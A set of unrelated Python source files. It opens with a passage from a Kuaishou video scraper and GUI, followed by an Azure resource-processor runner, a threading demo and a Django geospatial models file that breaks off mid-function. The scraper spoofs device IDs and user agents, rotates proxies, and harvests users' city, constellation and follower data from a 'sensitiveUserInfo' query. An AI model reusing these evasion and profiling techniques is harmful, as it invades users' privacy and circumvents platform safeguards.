"query": "query privateFeedsQuery($principalId: String, $pcursor: String, $count: Int) {\n privateFeeds(principalId: $principalId, pcursor: $pcursor, count: $count) {\n pcursor\n list {\n id\n thumbnailUrl\n poster\n workType\n type\n useVideoPlayer\n imgUrls\n imgSizes\n magicFace\n musicName\n caption\n location\n liked\n onlyFollowerCanComment\n relativeHeight\n timestamp\n width\n height\n counts {\n displayView\n displayLike\n displayComment\n __typename\n }\n user {\n id\n eid\n name\n avatar\n __typename\n }\n expTag\n __typename\n }\n __typename\n }\n}\n"}
resp = requests.post(DATA_URL, headers=self.__headers_web, json=payload,
# proxies=proxies
)
resp.raise_for_status()
work_list = json.loads(resp.content.decode(encoding='utf-8', errors='strict'))['data']['privateFeeds']['list']
# 防止该用户在直播,第一个作品默认为直播,导致获取信息为NoneType
if work_list[0]['id'] is None:
work_list.pop(0)
nickname = re.sub(r'[\\/:*?"<>|\r\n]+', "", work_list[0]['user']['name'])
# 启动另一线程获取并保存用户个人信息
t = threading.Thread(target=self.get_user_info, args=(uid, work_list,nickname))
t.start()
# 构造以昵称(id)为名称的文件夹
dir_name = "data/" + nickname + "(" + uid + ")/"
if not os.path.exists(dir_name):
os.makedirs(dir_name)
print("开始爬取用户 " + nickname + ",保存在目录 " + dir_name)
print(" 共有" + str(len(work_list)) + "个作品")
for i in range(len(work_list)):
self.q_works.put([dir_name, work_list[i], i + 1])
t_list = []
for i in range(50):
t = threading.Thread(target=self.get_works)
t.start()
t_list.append(t)
for t in t_list:
t.join()
print("用户 " + nickname + "爬取完成!")
# 3.获取视频信息
def get_works(self):
while True:
if self.q_works.qsize() != 0:
dir_name, work, wk_index = self.q_works.get()
w_type = work['workType']
w_caption = re.sub(r"\s+", " ", work['caption'])
w_name = re.sub(r'[\\/:*?"<>|\r\n]+', "", w_caption)[0:24]
w_time = time.strftime('%Y-%m-%d', time.localtime(work['timestamp'] / 1000))
w_index = ""
if w_type == 'vertical' or w_type == 'multiple' or w_type == "single" or w_type == 'ksong':
# 下载图片集
w_urls = work['imgUrls']
l = len(w_urls)
print(" " + str(wk_index) + ")图集作品:" + w_caption + "," + "共有" + str(l) + "张图片")
for i in range(l):
p_name = w_time + w_index + "_" + w_name + "_" + str(i + 1) + '.jpg'
pic = dir_name + p_name
if not os.path.exists(pic):
proxy_ = random.choice(IP_LIST)
proxies = {'{}'.format(proxy_['type']): '{0}:{1}'.format(proxy_['ip'], proxy_['port'])}
r = requests.get(w_urls[i].replace("webp", "jpg"),
# proxies=proxies
)
r.raise_for_status()
with open(pic, "wb") as f:
f.write(r.content)
print(" " + str(i + 1) + "/" + str(l) + " 图片 " + p_name + " 下载成功 √")
else:
print(" " + str(i + 1) + "/" + str(l) + " 图片 " + p_name + " 已存在 √")
elif w_type == 'video':
# 下载视频集
vid = work['id']
uid = self.user_id
self.get_video_url(uid, vid, dir_name,nums=True)
try:
print(" " + str(wk_index) + ")视频作品:" + w_caption + " 下载成功 √")
except:
print(" 这里似乎有点小错误,已跳过")
else:
print("错误的类型")
self.q_works.task_done()
else:
return
# 5.获取视频链接并下载
def get_video_url(self,uid,vid,dir_name,nums=False):
# print(uid,vid,dir_name)
proxy_ = random.choice(IP_LIST)
proxies = {'{}'.format(proxy_['type']): '{0}:{1}'.format(proxy_['ip'], proxy_['port'])}
self.__headers_and['User-Agent'] = random.choice(UA_AND_LIST)
did = random.choice(DID_AND_LIST)
try:
# 无水印下载链接
# self.__headers_and['Cookie'] = 'did=' + did
self.__headers_and['Cookie'] = re.sub('did=.*?;', 'did=' + did + ';', self.__cookie)
video_url = WORK_URL + vid
resp = requests.get(video_url, headers=self.__headers_and, params={"did": did},timeout=20
# proxies=proxies
)
resp.raise_for_status()
html = resp.text
pattern = '"srcNoMark":"(https:.*?).mp4'
'''无水印:https://txmov2.a.yximgs.com/upic/2020/09/01/11/BMjAyMDA5MDExMTE3MThfMTM1Njk3NTc3OV8zNTM2NjQ2OTUxNF8wXzM=_b_Be53756194a8110de7e2153cfef04f7b0.mp4'''
playUrl = re.search(pattern, html).group(1) + ".mp4"
if not nums:
video_info = {}
try:
video_info['作者'] = re.search('<div class="auth-name">(.*?)</div>', html).group(1)
video_info['简介'] = re.search('<div class="caption-container">(.*?)</div>', html).group(1)
video_info['点赞'] = re.search('"likeCount":"(.*?)",', html).group(1)
video_info['评论'] = re.search('"commentCount":"(.*?)",', html).group(1)
video_info['链接'] = playUrl
except:
pass
global USER_ITEM
USER_ITEM = video_info
resp_pro = requests.get(playUrl, timeout=20)
resp.raise_for_status()
content = resp_pro.content
with open(dir_name + vid + '.mp4', 'wb') as f:
f.write(content)
except Exception as e:
print('无水印下载失败',e)
try:
# 获取视频链接
payload = {"operationName": "SharePageQuery",
"variables": {"photoId": vid, "principalId": uid},
"query": "query SharePageQuery($principalId: String, $photoId: String) {\n feedById(principalId: $principalId, photoId: $photoId) {\n currentWork {\n playUrl\n __typename\n }\n __typename\n }\n}\n"
}
proxy_ = random.choice(IP_LIST)
proxies = {'{}'.format(proxy_['type']): '{0}:{1}'.format(proxy_['ip'], proxy_['port'])}
self.__headers_and['User-Agent'] = random.choice(UA_WEB_LIST)
self.__headers_and['Cookie'] = re.sub('did=.*?;', 'did=' + did + ';', self.__cookie)
resp = requests.post(DATA_URL, headers=self.__headers_and, json=payload,timeout=20,
# proxies = proxies
)
resp.raise_for_status()
resp_json = resp.json()
# 下载视频
playUrl = resp_json['data']['feedById']['currentWork']['playUrl']
resp_pro = requests.get(playUrl, timeout=20)
resp.raise_for_status()
content = resp_pro.content
path1 = './data/'
if not os.path.exists(path1):
os.makedirs(path1)
with open(dir_name + vid + '.mp4', 'wb') as f:
f.write(content)
except Exception as e:
print('有水印下载失败', e)
# 6.获取用户个人信息
def get_user_info(self,uid,work_list,nickname):
user_info = {}
video_list = []
for work in work_list:
video_item = {}
video_item['id'] = work['id']
video_item['封面'] = work['thumbnailUrl']
video_item['播放'] = work['counts']['displayView']
video_item['点赞'] = work['counts']['displayLike']
video_item['评论'] = work['counts']['displayComment']
video_item['链接'] = WORK_URL + video_item['id']
video_list.append(video_item)
user_info['id'] = work_list[1]['user']['id']
user_info['作者'] = work_list[1]['user']['name']
user_info['头像'] = work_list[1]['user']['avatar']
self.__headers_web['User-Agent'] = random.choice(UA_WEB_LIST)
self.__headers_web['Cookie'] = re.sub('did=.*?;', 'did=' + random.choice(DID_AND_LIST) + ';', self.__cookie)
payload = {"operationName": "sensitiveUserInfoQuery",
"variables": {"principalId": uid},
"query": "query sensitiveUserInfoQuery($principalId: String) {\n sensitiveUserInfo(principalId: $principalId) {\n kwaiId\n originUserId\n constellation\n cityName\n counts {\n fan\n follow\n photo\n liked\n open\n playback\n private\n __typename\n }\n __typename\n }\n}\n"}
resp = requests.post(DATA_URL, headers=self.__headers_web, json=payload,
# proxies=proxies
)
resp_json = resp.json()
userif = resp_json['data']['sensitiveUserInfo']
try:
user_info['星座'] = userif['constellation']
user_info['城市'] = userif['cityName']
user_info['粉丝'] = userif['counts']['fan']
user_info['关注'] = userif['counts']['follow']
user_info['作品'] = userif['counts']['photo']
except:
pass
global USER_ITEM
USER_ITEM = user_info
user_info['video_list'] = video_list
with open('./data/{}.json'.format(nickname),'w', encoding='utf8') as f:
json.dump({'item':user_info}, f, indent=4, ensure_ascii=False)
# 自定义qt线程执行后台任务
class Runthread(QThread):
# 通过类成员对象定义信号对象
signal = pyqtSignal(str)
def __init__(self,start_url,reviewEdit):
super(Runthread, self).__init__()
self.start_url = start_url
self.reviewEdit = reviewEdit
def __del__(self):
self.wait()
def run(self):
try:
self.list_flag = []
def start_spider(signal,list_flag):
# 进度条设置进度
for i in range(96):
time.sleep(0.6)
if len(list_flag) == 1:
break
# 注意这里与_signal = pyqtSignal(str)中的类型相同
signal.emit(str(i))
# 开启线程并启动
t = threading.Thread(target=start_spider, args=(self.signal,self.list_flag))
t.start()
# 启动爬虫
spider_KS = spider_ks(self.start_url, cookie)
spider_KS.spider_start()
# 模拟耗时操作
# sleep(40)
print('下载完成')
self.list_flag.append(0)
self.signal.emit(str(100))
except Exception as e:
print(e)
self.reviewEdit.setText('下载出错:',e)
# 前台界面
class Example(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
# 文本输入框
self.ipput_Edit = QLineEdit()
self.ipput_Edit.setPlaceholderText('请输入快手用户分享链接或视频分享链接...')
# 点击下载框
self.download_Button = QPushButton('下载')
# 添加槽函数
# download_Button.clicked.connect(self.pro_show)
self.download_Button.clicked.connect(lambda: self.buttonClicked())
# 进度条
self.pro_bar = QProgressBar()
# 详情显示框
self.reviewEdit = QTextEdit()
# 设置布局
grid = QGridLayout()
grid.setSpacing(10)
# 配置网格布局
grid.addWidget(self.ipput_Edit, 1, 0)
grid.addWidget(self.download_Button, 1, 1)
grid.addWidget(self.pro_bar,2,0,1,2)
grid.addWidget(self.reviewEdit, 3, 0,5,2)
self.setLayout(grid)
self.thread = None
# 设置窗口
self.resize(360, 250)
self.setWindowTitle('快手无水印视频下载')
self.show()
# 设置进度条以及按钮改变
def call_backlog(self, msg):
# 将线程的参数传入进度条以及显示框
self.pro_bar.setValue(int(msg))
self.reviewEdit.setText(msg)
# 达到满进度时设置下载按钮状态
if msg == '100':
del self.thread
self.reviewEdit.setText('下载完成')
self.download_Button.disconnect()
self.download_Button.clicked.connect(QCoreApplication.quit)
self.download_Button.setEnabled(True)
self.download_Button.setText('完成')
# print(USER_ITEM)
if USER_ITEM.get('video_list') != None:
del USER_ITEM['video_list']
for name,value in USER_ITEM.items():
self.reviewEdit.append(str(name) +':'+str(value))
def buttonClicked(self):
self.download_Button.setEnabled(False)
# 获取用户输入链接
input_text = ''.join(self.ipput_Edit.text().split('\n')).strip()
start_url = input_text
# start_url = 'https://v.kuaishouapp.com/s/fkbxgtrb '
try:
if 'https://v.kuaishouapp.com' not in start_url:
raise ValueError("必须是url链接")
# 设置按钮
self.download_Button.setText('下载中')
self.thread = Runthread(start_url,self.reviewEdit)
self.thread.signal.connect(self.call_backlog) # 进程连接回传到GUI的事件
self.thread.start()
except Exception as e:
set_text = '链接不正确,请重新输入或换一个链接。{}'.format(e)
self.reviewEdit.setText(set_text)
self.download_Button.setEnabled(True)
if __name__ == "__main__":
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
# 个人主页的分享链接
# start_url = 'https://v.kuaishouapp.com/s/gZB2Lgx2 '
# 单个视频
# start_url = 'https://v.kuaishouapp.com/s/PpGiewIE '
'''
加入了UI
可自动识别主页链接或者视频链接
先下载无水印的,如果出现验证则下载有水印的
加入了随机代理和随机UA和随机did
需要cookie
我是谁
'''
|
runner.py
|
import threading
from multiprocessing import Process
import json
import socket
import asyncio
import logging
import sys
from resources.commands import build_porter_command, build_porter_command_for_outputs
from shared.config import get_config
from resources.helpers import get_installation_id
from resources.httpserver import start_server
from shared.logging import disable_unwanted_loggers, initialize_logging, get_message_id_logger, shell_output_logger # pylint: disable=import-error # noqa
from resources import strings, statuses # pylint: disable=import-error # noqa
from contextlib import asynccontextmanager
from azure.servicebus import ServiceBusMessage
from azure.servicebus.aio import ServiceBusClient, AutoLockRenewer
from azure.identity.aio import DefaultAzureCredential
# Initialise logging
logger_adapter = initialize_logging(logging.INFO, socket.gethostname())
disable_unwanted_loggers()
# Initialise config
try:
config = get_config(logger_adapter)
except KeyError as e:
logger_adapter.error(f"Environment variable {e} is not set correctly...Exiting")
sys.exit(1)
@asynccontextmanager
async def default_credentials(msi_id):
"""
Context manager which yields the default credentials.
"""
credential = DefaultAzureCredential(managed_identity_client_id=msi_id) if msi_id else DefaultAzureCredential()
yield credential
await credential.close()
async def receive_message(service_bus_client):
"""
This method is an async generator which receives messages from service bus
and yields those messages. If the yielded function return True the message is
marked complete.
"""
async with service_bus_client:
q_name = config["resource_request_queue"]
renewer = AutoLockRenewer(max_lock_renewal_duration=1800)
receiver = service_bus_client.get_queue_receiver(queue_name=q_name, auto_lock_renewer=renewer)
async with receiver:
received_msgs = await receiver.receive_messages(max_message_count=1, max_wait_time=5)
for msg in received_msgs:
result = True
message = ""
try:
message = json.loads(str(msg))
result = (yield message)
except (json.JSONDecodeError) as e:
logging.error(f"Received bad service bus resource request message: {e}")
if result:
logging.info(f"Resource request for {message} is complete")
else:
logging.error('Message processing failed!')
logger_adapter.info(f"Message with id = {message['id']} processed as {result} and marked complete.")
await receiver.complete_message(msg)
async def run_porter(command):
"""
Run a Porter command
"""
proc = await asyncio.create_subprocess_shell(
''.join(command),
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
env=config["porter_env"])
stdout, stderr = await proc.communicate()
logging.info(f'run porter exited with {proc.returncode}')
result_stdout = None
result_stderr = None
if stdout:
result_stdout = stdout.decode()
shell_output_logger(result_stdout, '[stdout]', logger_adapter, logging.INFO)
if stderr:
result_stderr = stderr.decode()
shell_output_logger(result_stderr, '[stderr]', logger_adapter, logging.WARN)
return (proc.returncode, result_stdout, result_stderr)
def service_bus_message_generator(sb_message, status, deployment_message, outputs=None):
"""
Generate a resource request message
"""
installation_id = get_installation_id(sb_message)
message_dict = {
"operationId": sb_message["operationId"],
"id": sb_message["id"],
"status": status,
"message": f"{installation_id}: {deployment_message}"}
if outputs is not None:
message_dict["outputs"] = outputs
resource_request_message = json.dumps(message_dict)
return resource_request_message
async def invoke_porter_action(msg_body, sb_client, message_logger_adapter) -> bool:
"""
Handle resource message by invoking specified porter action (i.e. install, uninstall)
"""
installation_id = get_installation_id(msg_body)
action = msg_body["action"]
message_logger_adapter.info(f"{installation_id}: {action} action starting...")
sb_sender = sb_client.get_queue_sender(queue_name=config["deployment_status_queue"])
# If the action is install/upgrade, post message on sb queue to start a deployment job
if action == "install" or action == "upgrade":
resource_request_message = service_bus_message_generator(msg_body, strings.RESOURCE_STATUS_DEPLOYING, "Deployment job starting")
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
# Build and run porter command (flagging if its a built-in action or custom so we can adapt porter command appropriately)
is_custom_action = action not in ["install", "upgrade", "uninstall"]
porter_command = await build_porter_command(config, message_logger_adapter, msg_body, is_custom_action)
returncode, _, err = await run_porter(porter_command)
# Handle command output
if returncode != 0:
error_message = "Error context message = " + " ".join(err.split('\n')) + " ; Command executed: ".join(porter_command)
resource_request_message = service_bus_message_generator(msg_body, statuses.failed_status_string_for[action], error_message)
# Post message on sb queue to notify receivers of action failure
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
message_logger_adapter.info(f"{installation_id}: Porter action failed with error = {error_message}")
return False
else:
# Get the outputs
# TODO: decide if this should "fail" the deployment
_, outputs = await get_porter_outputs(msg_body, message_logger_adapter)
success_message = f"{action} action completed successfully."
resource_request_message = service_bus_message_generator(msg_body, statuses.pass_status_string_for[action], success_message, outputs)
await sb_sender.send_messages(ServiceBusMessage(body=resource_request_message, correlation_id=msg_body["id"]))
message_logger_adapter.info(f"{installation_id}: {success_message}")
return True
async def get_porter_outputs(msg_body, message_logger_adapter):
"""
Get outputs JSON from a Porter command
"""
porter_command = await build_porter_command_for_outputs(msg_body)
returncode, stdout, err = await run_porter(porter_command)
if returncode != 0:
error_message = "Error context message = " + " ".join(err.split('\n'))
message_logger_adapter.info(f"{get_installation_id(msg_body)}: Failed to get outputs with error = {error_message}")
return False, ""
else:
outputs_json = {}
try:
outputs_json = json.loads(stdout)
message_logger_adapter.info(f"Got outputs as json: {outputs_json}")
except ValueError:
message_logger_adapter.error(f"Got outputs invalid json: {stdout}")
return True, outputs_json
async def runner(process_num):
async with default_credentials(config["vmss_msi_id"]) as credential:
service_bus_client = ServiceBusClient(config["service_bus_namespace"], credential)
logger_adapter.info("Starting message receiving loop...")
while True:
logger_adapter.info(f'Process {process_num}: Checking for new messages...')
receive_message_gen = receive_message(service_bus_client)
try:
async for message in receive_message_gen:
logger_adapter.info(f"Process {process_num}: Message received with id={message['id']}")
message_logger_adapter = get_message_id_logger(message['id']) # logger includes message id in every entry.
result = await invoke_porter_action(message, service_bus_client, message_logger_adapter)
await receive_message_gen.asend(result)
except StopAsyncIteration: # the async generator when finished signals end with this exception.
pass
logger_adapter.info(f'Process {process_num}: All messages processed. Sleeping...')
await asyncio.sleep(30)
def start_runner_process(process_num):
asyncio.ensure_future(runner(process_num))
event_loop = asyncio.get_event_loop()
event_loop.run_forever()
logger_adapter.info("Started resource processor")
if __name__ == "__main__":
httpserver_thread = threading.Thread(target=start_server)
httpserver_thread.start()
logger_adapter.info("Started http server")
logger_adapter.info(f'Starting {str(config["number_processes_int"])} processes...')
for i in range(config["number_processes_int"]):
logger_adapter.info(f'Starting process {str(i)}')
process = Process(target=start_runner_process, args=(str(i)))
process.start()
|
multi-t.py
|
import threading
def calc_square(number):
print(f'Square: {number * number}')
def calc_quad(number):
print(f'Quad: {number * number * number * number}')
if __name__ == "__main__":
print(f'Starting execution of {__name__}...')
number = 7
thread1 = threading.Thread(target=calc_square, args=(number,))
thread2 = threading.Thread(target=calc_quad, args=(number,))
# Will execute both in parallel
thread1.start()
thread2.start()
# Joins threads back to the parent process, which is this
# program
thread1.join()
thread2.join()
# This program reduces the time of execution by running tasks in parallel
|
models.py
|
# -*- coding: utf-8 -*-
from __future__ import annotations
import copy
import json
import logging
import multiprocessing
import uuid
from enum import Enum
from typing import TYPE_CHECKING, Dict, List, Type, Union, cast
import yaml
from django.contrib.auth.models import Group, User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.contrib.gis.db import models
from django.contrib.gis.geos import GeometryCollection, GEOSGeometry, MultiPolygon, Polygon
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django.core.serializers import serialize
from django.db.models import Case, Q, QuerySet, Value, When
from django.utils import timezone
from yaml import CDumper, CLoader
from eventkit_cloud import settings
from eventkit_cloud.core.helpers import get_or_update_session
from eventkit_cloud.core.models import (
AttributeClass,
CachedModelMixin,
DownloadableMixin,
GroupPermissionLevel,
LowerCaseCharField,
TimeStampedModelMixin,
UIDMixin,
)
from eventkit_cloud.jobs.enumerations import GeospatialDataType
from eventkit_cloud.utils.services import get_client
from eventkit_cloud.utils.services.check_result import CheckResult, get_status_result
from eventkit_cloud.utils.services.types import LayersDescription
from eventkit_cloud.utils.types.django_helpers import ListOrQuerySet
if TYPE_CHECKING:
from eventkit_cloud.utils.services.base import GisClient
logger = logging.getLogger(__name__)
# construct the upload path for export config files..
def get_upload_path(instance, *args):
"""
Construct the path to where the uploaded config file is to be stored.
"""
configtype = instance.config_type.lower()
# sanitize the filename here..
path = "export/config/{0}/{1}".format(configtype, instance.filename)
logger.debug("Saving export config to /media/{0}".format(path))
return path
class MapImageSnapshot(DownloadableMixin, UIDMixin):
"""
A MapImageSnapshot is an image snapshot capturing a map in a particular state or time.
"""
class Meta:
db_table = "MapImageSnapshot"
def __str__(self):
return "MapImageSnapshot ({}), {}".format(self.uid, self.filename)
def clone(self):
self.id = None
self.uid = None
self.save()
return self
class DatamodelPreset(TimeStampedModelMixin):
"""
Model provides admin interface to presets.
These were previously provided by files like hdm_presets.xml / osm_presets.xml.
"""
name = models.CharField(max_length=10)
json_tags = models.JSONField(default=list)
class Meta:
db_table = "datamodel_preset"
def __str__(self):
return self.name
def to_dict(self):
return {"name": self.name, "json_tags": self.json_tags}
class License(TimeStampedModelMixin):
"""
Model to hold license information to be used with DataProviders.
"""
slug = LowerCaseCharField(max_length=40, unique=True, default="")
name = models.CharField(max_length=100, db_index=True)
text = models.TextField(default="")
def __str__(self):
return "{0}".format(self.name)
class UserLicense(TimeStampedModelMixin):
"""
Model to hold which licenses a User acknowledges.
"""
user = models.ForeignKey(User, on_delete=models.CASCADE)
license = models.ForeignKey(License, on_delete=models.CASCADE)
def __str__(self):
return "{0}: {1}".format(self.user.username, self.license.name)
class Projection(UIDMixin, TimeStampedModelMixin):
"""
Model for a Projection.
"""
name = models.CharField(max_length=100)
srid = models.IntegerField(unique=True)
description = models.CharField(max_length=255, null=True, blank=True)
def __str__(self):
return "{0}".format(self.name)
class ExportFormat(UIDMixin, TimeStampedModelMixin):
"""
Model for a ExportFormat.
"""
safe_kwargs = [
"name",
"slug",
"description",
"cmd",
]
name = models.CharField(max_length=100)
slug = LowerCaseCharField(max_length=20, unique=True, default="")
description = models.CharField(max_length=255)
options = models.JSONField(default=dict, null=True, blank=True)
objects = models.Manager()
supported_projections = models.ManyToManyField(Projection, related_name="supported_projections")
class Meta: # pragma: no cover
managed = True
db_table = "export_formats"
def __str__(self):
return "{0}".format(self.name)
@classmethod
def get_or_create(cls, **kwargs):
blacklisted_keys = []
created = False
for _key in kwargs:
if _key not in cls.safe_kwargs:
blacklisted_keys.append(_key)
for _key in blacklisted_keys:
del kwargs[_key]
try:
format = cls.objects.get(slug=kwargs.get("slug").lower())
except ObjectDoesNotExist:
format = cls.objects.create(**kwargs)
created = True
return format, created
def get_supported_projection_list(self) -> List[int]:
supported_projections = self.supported_projections.all().values_list("srid", flat=True)
return list(supported_projections)
class DataProviderType(TimeStampedModelMixin):
"""
Model to hold types and supported exports for providers.
"""
id = models.AutoField(primary_key=True, editable=False)
type_name = models.CharField(verbose_name="Type Name", max_length=40, unique=True, default="")
supported_formats = models.ManyToManyField(ExportFormat, verbose_name="Supported Export Formats", blank=True)
use_bbox = models.BooleanField(verbose_name="Use bounding box to calculate area", default=False)
def __str__(self):
return "{0}".format(self.type_name)
class DataProvider(UIDMixin, TimeStampedModelMixin, CachedModelMixin):
"""
Model for a DataProvider.
"""
name = models.CharField(verbose_name="Service Name", unique=True, max_length=100)
slug = LowerCaseCharField(max_length=40, unique=True, default="")
label = models.CharField(verbose_name="Label", max_length=100, null=True, blank=True)
url = models.CharField(
verbose_name="Service URL",
max_length=1000,
null=True,
default="",
blank=True,
help_text="The SERVICE_URL is used as the endpoint for WFS, OSM, and WCS services. It is "
"also used to check availability for all OGC services. If you are adding a TMS "
"service, please provide a link to a single tile, but with the coordinate numbers "
"replaced by {z}, {y}, and {x}. Example: https://tiles.your-geospatial-site.com/"
"tiles/default/{z}/{y}/{x}.png",
)
preview_url = models.CharField(
verbose_name="Preview URL",
max_length=1000,
null=True,
default="",
blank=True,
help_text="This url will be served to the front end for displaying in the map.",
)
service_copyright = models.CharField(
verbose_name="Copyright",
max_length=2000,
null=True,
default="",
blank=True,
help_text="This information is used to display relevant copyright information.",
)
service_description = models.TextField(
verbose_name="Description",
null=True,
default="",
blank=True,
help_text="This information is used to provide information about the service.",
)
layer = models.CharField(verbose_name="Service Layer", max_length=100, null=True, blank=True)
export_provider_type = models.ForeignKey(
DataProviderType, verbose_name="Service Type", null=True, on_delete=models.CASCADE
)
max_selection = models.DecimalField(
verbose_name="Max selection area",
default=250,
max_digits=12,
decimal_places=3,
help_text="This is the maximum area in square kilometers that can be exported "
"from this provider in a single DataPack.",
)
level_from = models.IntegerField(
verbose_name="Seed from level",
default=0,
null=True,
blank=True,
help_text="This determines the starting zoom level the tile export will seed from.",
)
level_to = models.IntegerField(
verbose_name="Seed to level",
default=10,
null=True,
blank=True,
help_text="This determines the highest zoom level the tile export will seed to.",
)
config = models.TextField(
default="",
null=True,
blank=True,
verbose_name="Configuration",
help_text="""WMS, TMS, WMTS, and ArcGIS-Raster require a MapProxy YAML configuration
with a Sources key of imagery and a Service Layer name of imagery; the validator also
requires a layers section, but this isn't used.
OSM Services also require a YAML configuration.""",
)
DATA_TYPES = [
(GeospatialDataType.VECTOR.value, ("Vector")),
(GeospatialDataType.RASTER.value, ("Raster")),
(GeospatialDataType.ELEVATION.value, ("Elevation")),
(GeospatialDataType.MESH.value, ("Mesh")),
(GeospatialDataType.POINT_CLOUD.value, ("Point Cloud")),
]
data_type = models.CharField(
choices=DATA_TYPES,
max_length=20,
verbose_name="Data Type",
null=True,
default="",
blank=True,
help_text="The type of data provided (e.g. elevation, raster, vector)",
)
user = models.ForeignKey(User, related_name="+", null=True, default=None, blank=True, on_delete=models.CASCADE)
license = models.ForeignKey(
License, related_name="data_providers", null=True, blank=True, default=None, on_delete=models.CASCADE
)
zip = models.BooleanField(default=False)
display = models.BooleanField(default=False)
thumbnail = models.ForeignKey(
MapImageSnapshot,
blank=True,
null=True,
on_delete=models.SET_NULL,
help_text="A thumbnail image generated to give a high level" " preview of what a provider's data looks like.",
)
attribute_class = models.ForeignKey(
AttributeClass,
blank=True,
null=True,
on_delete=models.SET_NULL,
related_name="data_providers",
help_text="The attribute class is used to limit users access to resources using this data provider.",
)
the_geom = models.MultiPolygonField(
verbose_name="Covered Area",
srid=4326,
default="SRID=4326;MultiPolygon (((-180 -90,180 -90,180 90,-180 90,-180 -90)))",
)
class Meta: # pragma: no cover
managed = True
db_table = "export_provider"
# Check if config changed to updated geometry
__config = None
__url = None
__layer = None
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__config = self.config
self.__url = self.url
self.__layer = self.layer
def update_geom(self):
from eventkit_cloud.tasks.helpers import download_data
from eventkit_cloud.ui.helpers import file_to_geojson
geometry = None
if self.config != self.__config:
orig_extent_url = load_provider_config(self.__config).get("extent_url")
config = load_provider_config(self.config)
extent_url = config.get("extent_url")
if extent_url and extent_url != orig_extent_url:
random_uuid = uuid.uuid4()
session = get_or_update_session(**config)
if not extent_url:
return
output_file = download_data(task_uid=str(random_uuid), input_url=extent_url, session=session)
geojson = file_to_geojson(output_file)
geojson_geometry = geojson.get("geometry") or geojson.get("features", [{}])[0].get("geometry")
geometry = GEOSGeometry(json.dumps(geojson_geometry), srid=4326)
elif (self.url != self.__url) or (self.layer != self.__layer):
try:
client = self.get_service_client()
geometry = client.download_geometry()
except AttributeError as e:
# TODO: This fails in tests. How to handle failure to update geometry?
logger.info(e, exc_info=True)
if geometry:
self.the_geom = convert_polygon(geometry)
def get_service_client(self) -> GisClient:
url = self.url
if not self.url and "osm" in self.export_provider_type.type_name:
logger.error("Use of settings.OVERPASS_API_URL is deprecated and will be removed in 1.13")
url = settings.OVERPASS_API_URL
Client = get_client(self.export_provider_type.type_name)
config = None
if self.config:
config = load_provider_config(self.config)
return Client(url, self.layer, aoi_geojson=None, slug=self.slug, config=config)
def check_status(self, aoi_geojson: dict = None):
try:
client = self.get_service_client()
response = client.check(aoi_geojson=aoi_geojson)
except Exception as e:
logger.error(e, exc_info=True)
response = get_status_result(CheckResult.UNKNOWN_ERROR)
logger.error(f"An exception occurred while checking the {self.name} provider.", exc_info=True)
logger.info(f"Status of provider '{self.name}': {response}")
return response
def save(self, force_insert=False, force_update=False, *args, **kwargs):
# Something is closing the database connection which is raising an error.
# Using a separate process allows the connection to be closed in separate process while leaving it open.
proc = multiprocessing.dummy.Process(target=self.update_geom)
proc.start()
proc.join()
if not self.slug:
self.slug = self.name.replace(" ", "_").lower()
if len(self.slug) > 40:
self.slug = self.slug[0:39]
cache.delete(f"base-config-{self.slug}")
self.update_export_formats()
super(DataProvider, self).save(force_insert, force_update, *args, **kwargs)
def update_export_formats(self):
# TODO: Refactor utils/ogc_apiprocess into services.
from eventkit_cloud.utils.ogcapi_process import get_process_formats
process_formats = get_process_formats(self)
logger.info(f"Process_formats: {process_formats}")
for process_format in process_formats:
export_format, created = ExportFormat.get_or_create(**process_format)
if created:
# Use the value from process format which might be case sensitive,
# TODO: will likley run into issues if two remote services use same spelling and are case sensitive.
export_format.options = {"value": process_format.get("slug"), "providers": [self.slug], "proxy": True}
export_format.supported_projections.add(Projection.objects.get(srid=4326))
else:
providers = export_format.options.get("providers")
if providers:
providers = list(set(providers + [self.slug]))
export_format.options["providers"] = providers
else:
export_format.options = {"value": export_format.slug, "providers": [self.slug], "proxy": True}
export_format.save()
def __str__(self):
return "{0}".format(self.name)
@property
def metadata(self):
from eventkit_cloud.utils.mapproxy import get_mapproxy_metadata_url
if not self.config:
return None
config = yaml.load(self.config, Loader=CLoader)
url = config.get("sources", {}).get("info", {}).get("req", {}).get("url")
type = config.get("sources", {}).get("info", {}).get("type")
if url:
return {"url": get_mapproxy_metadata_url(self.slug), "type": type}
@property
def footprint_url(self):
from eventkit_cloud.utils.mapproxy import get_mapproxy_footprint_url
if not self.config:
return None
config = yaml.load(self.config, Loader=CLoader)
url = config.get("sources", {}).get("footprint", {}).get("req", {}).get("url")
if url:
return get_mapproxy_footprint_url(self.slug)
@property
def layers(self) -> LayersDescription:
"""
Used to populate the list of vector layers, typically for contextual or styling information.
:return: A list of layer names.
"""
if self.data_type != GeospatialDataType.VECTOR.value:
return {}
if self.config:
config = clean_config(str(self.config))
# As of EK 1.9.0 only vectors support multiple layers in a single provider
if self.export_provider_type.type_name in ["osm", "osm-generic"]:
return config
elif config.get("vector_layers"):
return {layer.get("name"): layer for layer in config.get("vector_layers", [])}
# Often layer names are configured using an index number but this number is not very
# useful when using the data so fall back to the slug which should be more meaningful.
if not self.layer: # check for NoneType or empty string
# TODO: support other service types
if self.export_provider_type.type_name in ["arcgis-feature"]:
return self.get_service_client().get_layers()
else:
return {self.slug: {"url": self.url, "name": self.slug}}
try:
int(self.layer) # noqa
return {
self.slug: {"url": self.url, "name": self.slug}
} # self.layer is an integer, so use the slug for better context.
except ValueError:
return {
self.layer: {"url": self.url, "name": self.layer}
} # If we got here, layer is not None or an integer so use that.
def get_use_bbox(self):
if self.export_provider_type is not None:
return self.export_provider_type.use_bbox
else:
return False
"""
Max datasize is the size in megabytes.
"""
@property
def max_data_size(self):
config = yaml.load(self.config, Loader=CLoader)
return None if config is None else config.get("max_data_size", None)
def get_max_data_size(self, user=None):
if not user:
return self.max_data_size
# the usersizerule set is looped instead of using a queryset filter so that it can be prefetched.
if user:
user_size_rule = list(
filter(lambda user_size_rule: user_size_rule.user == user, self.usersizerule_set.all())
)
if user_size_rule:
